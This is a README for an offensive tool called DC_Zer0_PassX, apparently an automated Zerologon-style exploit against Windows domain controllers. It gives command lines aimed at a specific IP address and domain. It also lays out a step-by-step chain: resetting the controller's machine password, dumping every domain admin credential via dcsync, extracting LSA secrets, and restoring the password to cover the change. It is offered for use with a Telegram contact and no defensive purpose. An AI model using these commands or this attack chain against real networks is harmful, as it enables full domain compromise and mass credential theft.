python DC_Zer0_PassX.py 155.231.231.2

# DC_Zer0_PassX
exploit with restore DC password automatically

## Usage
```
python DC_Zer0_PassX.py ip_addr

or

python DC_Zer0_PassX.py domain/'dc_name$'@ip_addr

E.g.
python DC_Zer0_PassX.py 155.231.231.2
python DC_Zer0_PassX.py fuckdc.com/'WIN-D6SJTQG7I0K$'@155.231.231.2
python DC_Zer0_PassX.py fuckdc.com/'WIN-D6SJTQG7I0K$'@155.231.231.2 -dc-ip 155.231.231.2
```

## How it works?
- First: Enumerate host info via ldap (get hostname & domain)
- Second: use DC_Zer0_PassX exploit to attack DC (after the exploit is finished, the DC password will be reset).
- Third: authenticate into LDAP with DC computer account (password is blank) to get domain admins.
- Fourth: retrieve all domain admins credentials with dcsync.
- Fifth: use the domain admin's credential to retrieve DC LSA secrets to get "plain_password_hex".
- Last: restore DC password with "plain_password_hex" by domain admin.

Telegram: @webhost666_official
